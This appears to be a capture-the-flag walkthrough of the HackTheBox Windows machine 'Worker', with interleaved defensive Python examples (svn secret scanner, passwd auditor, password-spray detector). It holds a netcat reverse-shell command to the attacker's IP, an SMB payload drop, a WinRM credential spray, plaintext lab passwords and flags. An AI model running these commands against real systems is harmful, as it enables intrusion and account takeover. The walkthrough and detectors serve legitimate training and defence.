| Machine Name | Level | OS | Logo |
|---|---|---|---|
| Worker - HTB | Medium | Windows | |
Walkthrough
Let's start with an nmap scan.
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
After spotting svn I started enumerating; at the same time WSMan is open, which means that if we can identify a user we will be able to connect. svn also made me think there might be a software project. My svn findings are below.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn ls svn://10.10.10.203
dimension.worker.htb/
moved.txt
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn checkout svn://10.10.10.203
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
A dimension.worker.htb/assets/css
A dimension.worker.htb/assets/css/fontawesome-all.min.css
A dimension.worker.htb/assets/css/main.css
A dimension.worker.htb/assets/css/noscript.css
A dimension.worker.htb/assets/js
A dimension.worker.htb/assets/js/breakpoints.min.js
A dimension.worker.htb/assets/js/browser.min.js
A dimension.worker.htb/assets/js/jquery.min.js
A dimension.worker.htb/assets/js/main.js
A dimension.worker.htb/assets/js/util.js
A dimension.worker.htb/assets/sass
A dimension.worker.htb/assets/sass/base
A dimension.worker.htb/assets/sass/base/_page.scss
A dimension.worker.htb/assets/sass/base/_reset.scss
A dimension.worker.htb/assets/sass/base/_typography.scss
A dimension.worker.htb/assets/sass/components
A dimension.worker.htb/assets/sass/components/_actions.scss
A dimension.worker.htb/assets/sass/components/_box.scss
A dimension.worker.htb/assets/sass/components/_button.scss
A dimension.worker.htb/assets/sass/components/_form.scss
A dimension.worker.htb/assets/sass/components/_icon.scss
A dimension.worker.htb/assets/sass/components/_icons.scss
A dimension.worker.htb/assets/sass/components/_image.scss
A dimension.worker.htb/assets/sass/components/_list.scss
A dimension.worker.htb/assets/sass/components/_table.scss
A dimension.worker.htb/assets/sass/layout
A dimension.worker.htb/assets/sass/layout/_bg.scss
A dimension.worker.htb/assets/sass/layout/_footer.scss
A dimension.worker.htb/assets/sass/layout/_header.scss
A dimension.worker.htb/assets/sass/layout/_main.scss
A dimension.worker.htb/assets/sass/layout/_wrapper.scss
A dimension.worker.htb/assets/sass/libs
A dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A dimension.worker.htb/assets/sass/libs/_functions.scss
A dimension.worker.htb/assets/sass/libs/_mixins.scss
A dimension.worker.htb/assets/sass/libs/_vars.scss
A dimension.worker.htb/assets/sass/libs/_vendor.scss
A dimension.worker.htb/assets/sass/main.scss
A dimension.worker.htb/assets/sass/noscript.scss
A dimension.worker.htb/assets/webfonts
A dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
A moved.txt
Checked out revision 5.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# s
s: command not found
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# ls 127 ⨯
10.10.10.203 dimension.worker.htb gobuster1 gobuster2 moved.txt
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
After updating my /etc/hosts file, I continued by checking the other revisions in svn.
┌──(root💀kali)-[~/oscp/htb/Worker/dimension.worker.htb]
└─# cd ..
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn up -r 2
Updating '.':
D moved.txt
A deploy.ps1
Updated to revision 2.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# ls -al
total 32
drwxr-xr-x 5 root root 4096 Aug 10 06:31 .
drwxr-xr-x 26 root root 4096 Aug 10 05:10 ..
drwxr-xr-x 4 root root 4096 Aug 10 05:28 10.10.10.203
-rw-r--r-- 1 root root 271 Aug 10 06:31 deploy.ps1
drwxr-xr-x 4 root root 4096 Aug 10 06:19 dimension.worker.htb
-rw-r--r-- 1 root root 1065 Aug 10 06:19 gobuster1
-rw-r--r-- 1 root root 1093 Aug 10 06:21 gobuster2
drwxr-xr-x 4 root root 4096 Aug 10 06:18 .svn
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# cat deploy.ps1
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
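The deploy script above was deleted from the repository in a later revision, but `svn up -r 2` still brings it back: anything committed once stays in history. As an added example (not code from the write-up or from the Worker team), the scanner below walks every revision rather than only HEAD and flags the patterns a reviewer would object to in a PowerShell deployment script. The `HISTORY` layout, the regexes and the `scan_history` name are assumptions made for this example; the script contents are the ones shown above.

```python
import re

# Constructed snapshot of the repository: revision number -> {path: contents}.
# r2 carries the deploy script; r5 (HEAD) only has the "moved" note, so scanning
# HEAD alone would miss the credential. The revision layout is an assumption.
HISTORY = {
    2: {"deploy.ps1": '$user = "nathen"\n'
                      '$plain = "wendel98"\n'
                      '$pwd = ($plain | ConvertTo-SecureString)\n'
                      '$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd\n'
                      '$args = "Copy-Site.ps1"\n'
                      'Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")\n'},
    5: {"moved.txt": "This repository has been migrated (constructed note for the example).\n"},
}

# Patterns a reviewer would flag in PowerShell deployment scripts (constructed, not exhaustive)
SECRET_PATTERNS = [
    ("string literal assigned to a password-like variable",
     re.compile(r'\$\w*(?:pass|pwd|plain|secret)\w*\s*=\s*"[^"]*"', re.I)),
    ("value piped into ConvertTo-SecureString inside the script",
     re.compile(r'\|\s*ConvertTo-SecureString', re.I)),
    ("PSCredential constructed from values held in the script",
     re.compile(r'\bPSCredential\b')),
]


def scan_text(text):
    """Return (line_number, description) for every line matching a secret pattern."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for desc, pat in SECRET_PATTERNS:
            if pat.search(line):
                hits.append((lineno, desc))
    return hits


def scan_history(history):
    """Scan every revision, not only HEAD: a secret committed once stays
    retrievable with `svn up -r N` even after a later revision deletes the file."""
    findings = []
    for rev in sorted(history):
        for path, text in history[rev].items():
            for lineno, desc in scan_text(text):
                findings.append({"rev": rev, "path": path, "line": lineno, "issue": desc})
    return findings


if __name__ == "__main__":
    for f in scan_history(HISTORY):
        print(f"r{f['rev']} {f['path']}:{f['line']}  {f['issue']}")
```

Against a real repository the same loop would run over `svn log -q` revisions and `svn cat -r N`; the point is that a scan of the working copy at HEAD reports nothing while r2 still holds the credential, so the fix is rotating the password, not just deleting the file.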
We found a great user. I tried connecting to WSMan but could not. Then, when I went to http://devops.worker.htb, I was able to log in to the basic authentication prompt with nathen:wendel98. When I worked as a developer at the Ministry of Health we used TFS for process tracking. I like Microsoft, and there is a similar TFS on Azure. Tasks have been created and commits matching those tasks have been entered. It was very clear that my goal was to get a reverse shell through one of these projects and connect to the machine.
I picked a project and created a new branch, then merged it; that way I was able to upload my web shell. The related screenshot is below.
Now let's view the web shell. For this I updated my /etc/hosts file again.
I started an SMB server on my Kali and dropped nc.exe onto the target machine. Then I got a reverse shell.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# /usr/local/bin/smbserver.py KUDAY . -smb2support 130 ⨯
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.203,52693)
[*] AUTHENTICATE_MESSAGE (\,WORKER)
[*] User WORKER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:KUDAY)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KUDAY)
[*] Closing down connection (10.10.10.203,52693)
[*] Remaining connections []
The payload I used to send nc.exe: copy \\10.10.14.5\KUDAY\nc.exe C:\Windows\Temp\nc.exe
C:\Windows\Temp\nc.exe -e cmd.exe 10.10.14.5 443
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# nc -lvp 443
listening on [any] 443 ...
connect to [10.10.14.5] from alpha.worker.htb [10.10.10.203] 52695
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
w:\sites\alpha.worker.htb>
After this stage I did a lot of enumeration and used the automated scripts, but nothing useful came out. Then I started manually going through the w:\ drive. When I started PowerShell and entered the command below I got interesting results.
Get-ChildItem -Recurse | Select-String "pass" -List | Select Path
...
W:\sites\twenty.worker.htb\assets\webfonts\fa-regular-400.svg
W:\sites\twenty.worker.htb\assets\webfonts\fa-regular-400.ttf
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.eot
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.svg
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.ttf
W:\svnrepos\www\conf\passwd
W:\svnrepos\www\conf\svnserve.conf
W:\svnrepos\www\db\revs\0\1
W:\svnrepos\www\db\revs\0\3
W:\svnrepos\www\hooks\post-commit.tmpl
W:\svnrepos\www\hooks\post-lock.tmpl
W:\svnrepos\www\hooks\post-revprop-change.tmpl
W:\svnrepos\www\hooks\post-unlock.tmpl
W:\svnrepos\www\hooks\pre-commit.tmpl
W:\svnrepos\www\hooks\pre-lock.tmpl
W:\svnrepos\www\hooks\pre-revprop-change.tmpl
W:\svnrepos\www\hooks\pre-unlock.tmpl
W:\svnrepos\www\hooks\start-commit.tmpl
When I read the passwd file I found usernames and passwords. Let's test them right away.
PS W:\svnrepos\www\conf> cat passwd
cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
I quickly built my wordlists.
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat cred
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat convert.py
# Read the "user = password" lines copied from the svn passwd file
dosya = open("cred")
cred = dosya.read().split("\n")
dosya.close()
dosya4username = open("username", "a")
dosya4password = open("password", "a")
for i in cred:
    parts = i.replace("=", " ").split()
    # Skip blank lines: the trailing newline leaves an empty last element,
    # and split()[1] on it raises IndexError
    if len(parts) < 2:
        continue
    dosya4username.write(parts[0] + "\n")
    dosya4password.write(parts[1] + "\n")
dosya4username.close()
dosya4password.close()
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# python3 convert.py
Traceback (most recent call last):
File "/root/oscp/htb/Worker/Users/convert.py", line 11, in <module>
dosya4username.write(i.replace("="," ").split()[0]+"\n")
IndexError: list index out of range
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat username 1 ⨯
nathen
nichin
nichin
noahip
nuahip
oakhol
owehol
paihol
parhol
pathop
pauhor
payhos
perhou
peyhou
phihou
quehub
quihud
rachul
raehun
ramhun
ranhut
rebhyd
reeinc
reeing
reiing
renipr
rhiire
riairv
ricisa
robish
robisl
robive
ronkay
rubkei
rupkel
ryakel
sabken
samken
sapket
sarkil
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat password
wendel98
fqerfqerf
asifhiefh
player
wkjdnw
bxwdjhcue
supersecret
painfulcode
gitcommit
iliketomoveit
nowayjose
icanjive
elvisisalive
ineedvacation
pokemon
pickme
kindasecure
guesswho
idontknow
thisis
getting
rediculous
iagree
tosomepoint
isthisenough
dummy
users
canyou
seewhich
onesare
wolves11
andwhich
onesare
the
sheeps
imtired
drjones
aqua
hamburger
friday
There is a Python error there, but it is something that happens at the end of the program; those who know Python will understand. It is caused by the empty element on the last line when reading the file. Nothing to worry about. Now let's try it!
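Two things from the last steps are worth carrying into an audit: the recursive "pass" search landed on W:\svnrepos\www\conf\passwd, a file that stores svnserve credentials in plaintext by design, and convert.py tripped on the blank line that ends the file. The following is an added example, not code from the write-up: a parser for the svnserve passwd format that tolerates comments, section headers and trailing blank lines, followed by the checks a defender would run on it (duplicate entries, a credential already exposed in deploy.ps1, and passwords below a length floor). The sample file is a constructed excerpt of the entries shown above; `audit_passwd`, `KNOWN_LEAKED` and the 8-character floor are assumptions for the example.

```python
import re
from collections import defaultdict

# Constructed excerpt in svnserve's passwd format: a few of the entries shown
# above plus the trailing blank line that tripped convert.py
SAMPLE_PASSWD = """\
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
robisl = wolves11
rubkei = the

"""

# Credential already committed elsewhere in the repository (deploy.ps1 above)
KNOWN_LEAKED = {("nathen", "wendel98")}


def parse_svnserve_passwd(text):
    """Parse the [users] section: one 'name = password' per line.
    Blank lines, ### comments and other sections are skipped; duplicate
    names are kept so the audit can report them."""
    pairs = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            section = header.group(1)
            continue
        if section != "users" or "=" not in line:
            continue
        user, _, password = line.partition("=")
        pairs.append((user.strip(), password.strip()))
    return pairs


def audit_passwd(pairs, known_leaked=frozenset(), min_length=8):
    """Return (user, reason) findings: duplicate entries, credentials already
    exposed elsewhere, and passwords shorter than the policy minimum."""
    findings = []
    by_user = defaultdict(list)
    for user, password in pairs:
        by_user[user].append(password)
    for user, passwords in by_user.items():
        if len(passwords) > 1:
            findings.append((user, f"{len(passwords)} entries; unclear which password is active"))
    for user, password in pairs:
        if (user, password) in known_leaked:
            findings.append((user, "same credential committed in deploy.ps1 (reuse across repo and deployment)"))
        if len(password) < min_length:
            findings.append((user, f"password shorter than {min_length} characters"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_passwd(parse_svnserve_passwd(SAMPLE_PASSWD), KNOWN_LEAKED):
        print(f"{user}: {reason}")
```

Because svnserve's passwd file is plaintext by design, the file itself is a secret: it belongs under a tight ACL, outside any tree the web server's identity can read, or replaced by SASL authentication (`use-sasl = true` in svnserve.conf), and every account listed in it should be treated as exposed once the file has been readable from a web shell.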
┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# crackmapexec winrm -u username -p password --no-bruteforce 10.10.10.203
WINRM 10.10.10.203 5985 NONE [*] None (name:10.10.10.203) (domain:None)
WINRM 10.10.10.203 5985 NONE [*] http://10.10.10.203:5985/wsman
WINRM 10.10.10.203 5985 NONE [-] None\nathen:wendel98
WINRM 10.10.10.203 5985 NONE [-] None\nichin:fqerfqerf
WINRM 10.10.10.203 5985 NONE [-] None\nichin:asifhiefh
WINRM 10.10.10.203 5985 NONE [-] None\noahip:player
WINRM 10.10.10.203 5985 NONE [-] None\nuahip:wkjdnw
WINRM 10.10.10.203 5985 NONE [-] None\oakhol:bxwdjhcue
WINRM 10.10.10.203 5985 NONE [-] None\owehol:supersecret
WINRM 10.10.10.203 5985 NONE [-] None\paihol:painfulcode
WINRM 10.10.10.203 5985 NONE [-] None\parhol:gitcommit
WINRM 10.10.10.203 5985 NONE [-] None\pathop:iliketomoveit
WINRM 10.10.10.203 5985 NONE [-] None\pauhor:nowayjose
WINRM 10.10.10.203 5985 NONE [-] None\payhos:icanjive
WINRM 10.10.10.203 5985 NONE [-] None\perhou:elvisisalive
WINRM 10.10.10.203 5985 NONE [-] None\peyhou:ineedvacation
WINRM 10.10.10.203 5985 NONE [-] None\phihou:pokemon
WINRM 10.10.10.203 5985 NONE [-] None\quehub:pickme
WINRM 10.10.10.203 5985 NONE [-] None\quihud:kindasecure
WINRM 10.10.10.203 5985 NONE [-] None\rachul:guesswho
WINRM 10.10.10.203 5985 NONE [-] None\raehun:idontknow
WINRM 10.10.10.203 5985 NONE [-] None\ramhun:thisis
WINRM 10.10.10.203 5985 NONE [-] None\ranhut:getting
WINRM 10.10.10.203 5985 NONE [-] None\rebhyd:rediculous
WINRM 10.10.10.203 5985 NONE [-] None\reeinc:iagree
WINRM 10.10.10.203 5985 NONE [-] None\reeing:tosomepoint
WINRM 10.10.10.203 5985 NONE [-] None\reiing:isthisenough
WINRM 10.10.10.203 5985 NONE [-] None\renipr:dummy
WINRM 10.10.10.203 5985 NONE [-] None\rhiire:users
WINRM 10.10.10.203 5985 NONE [-] None\riairv:canyou
WINRM 10.10.10.203 5985 NONE [-] None\ricisa:seewhich
WINRM 10.10.10.203 5985 NONE [-] None\robish:onesare
WINRM 10.10.10.203 5985 NONE [+] None\robisl:wolves11 (Pwn3d!)
robisl:wolves11
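The spray above tries one password per account from a single source, so per-account lockout thresholds are never reached; what does stand out in the Security log is one source address failing network logons for many different accounts in a short window, followed by a success. As an added example (not from the write-up), the detector below runs that rule over a constructed JSON-lines export of 4625/4624 events. The field names follow the Windows logon event schema (`TargetUserName`, `IpAddress`, `LogonType`), but the records, timestamps and the `detect_spray` thresholds are made up for the example.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log excerpt as JSON lines: many accounts failing from one
# source within seconds, then one success, plus an unrelated single failure.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"TimeCreated": "2021-08-10T21:00:01", "EventID": 4625, "TargetUserName": "nathen", "IpAddress": "10.10.14.5", "LogonType": 3},
    {"TimeCreated": "2021-08-10T21:00:02", "EventID": 4625, "TargetUserName": "nichin", "IpAddress": "10.10.14.5", "LogonType": 3},
    {"TimeCreated": "2021-08-10T21:00:03", "EventID": 4625, "TargetUserName": "noahip", "IpAddress": "10.10.14.5", "LogonType": 3},
    {"TimeCreated": "2021-08-10T21:00:04", "EventID": 4625, "TargetUserName": "nuahip", "IpAddress": "10.10.14.5", "LogonType": 3},
    {"TimeCreated": "2021-08-10T21:00:05", "EventID": 4625, "TargetUserName": "oakhol", "IpAddress": "10.10.14.5", "LogonType": 3},
    {"TimeCreated": "2021-08-10T21:00:06", "EventID": 4624, "TargetUserName": "robisl", "IpAddress": "10.10.14.5", "LogonType": 3},
    # one mistyped password from a workstation earlier in the day: must not alert
    {"TimeCreated": "2021-08-10T09:14:00", "EventID": 4625, "TargetUserName": "nathen", "IpAddress": "10.10.20.7", "LogonType": 3},
])


def load_events(jsonl):
    """Parse JSON lines into dicts, attach a datetime and sort by time."""
    events = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    for e in events:
        e["time"] = datetime.fromisoformat(e["TimeCreated"])
    return sorted(events, key=lambda e: e["time"])


def detect_spray(jsonl, min_accounts=5, window=timedelta(minutes=5)):
    """Alert when one source IP fails network logons (type 3) for at least
    min_accounts distinct accounts inside `window`, and report any account
    that then logged on successfully from the same source in that window."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for e in load_events(jsonl):
        if e.get("LogonType") != 3:      # WinRM over NTLM produces network logons
            continue
        record = (e["time"], e["TargetUserName"])
        if e["EventID"] == 4625:
            failures[e["IpAddress"]].append(record)
        elif e["EventID"] == 4624:
            successes[e["IpAddress"]].append(record)

    alerts = []
    for ip, fails in failures.items():
        for i, (start, _) in enumerate(fails):          # sliding window per source
            end = start + window
            accounts = {user for t, user in fails[i:] if t <= end}
            if len(accounts) >= min_accounts:
                landed = sorted({user for t, user in successes[ip] if start <= t <= end})
                alerts.append({"source": ip, "first_failure": start.isoformat(),
                               "accounts_tried": len(accounts), "success_after": landed})
                break                                    # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_EVENTS):
        print(alert)
```

The rule only fires if failure auditing for logon events is enabled on the host; the `success_after` list is what turns the alert from "someone is guessing" into "this account is now compromised" and should drive the response.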
Great! Let's connect with evil-winrm.
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# evil-winrm -i 10.10.10.203 -u robisl -p wolves11 130 ⨯
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..
*Evil-WinRM* PS C:\Users\robisl> ls
Directory: C:\Users\robisl
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/5/2020 7:32 PM Desktop
d-r--- 4/4/2020 11:35 PM Documents
d-r--- 9/15/2018 9:12 AM Downloads
d-r--- 9/15/2018 9:12 AM Favorites
d-r--- 9/15/2018 9:12 AM Links
d-r--- 9/15/2018 9:12 AM Music
d-r--- 9/15/2018 9:12 AM Pictures
d----- 9/15/2018 9:12 AM Saved Games
d-r--- 9/15/2018 9:12 AM Videos
*Evil-WinRM* PS C:\Users\robisl> cd Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls
Directory: C:\Users\robisl\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/10/2021 8:59 PM 34 user.txt
*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
5455ed43a205185208157dcc76502d43
*Evil-WinRM* PS C:\Users\robisl\Desktop>
Afterwards I connected to Azure DevOps again with this user and saw a different project. I noticed that I could create pipelines. DevOps is not an area I know well, and it's worth saying that up front, so I won't talk here about some things I'm not sure of. I'm waiting for Pentester Academy's trainings 🙂 But I do know that pipelines let me run code at the operating-system level. When I ran code in the way shown below, I got a reverse shell with root privileges (so to speak, the machine is Windows).
┌──(root💀kali)-[~/oscp/htb/Worker]
└─# nc -lvp 443 1 ⨯
listening on [any] 443 ...
connect to [10.10.14.5] from devops.worker.htb [10.10.10.203] 50788
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
W:\agents\agent11\_work\8\s>whoami
whoami
nt authority\system
W:\agents\agent11\_work\8\s>c:
c:
C:\>dir "*root*.txt" /s /p
dir "*root*.txt" /s /p
Volume in drive C has no label.
Volume Serial Number is 32D6-9041
Directory of C:\Users\Administrator\Desktop
2021-08-10 20:59 34 root.txt
1 File(s) 34 bytes
Total Files Listed:
1 File(s) 34 bytes
0 Dir(s) 10 384 883 712 bytes free
C:\>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dtype root.txt
dtype root.txt
'dtype' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
fdae81646ff993d7125b423f6fd93f8d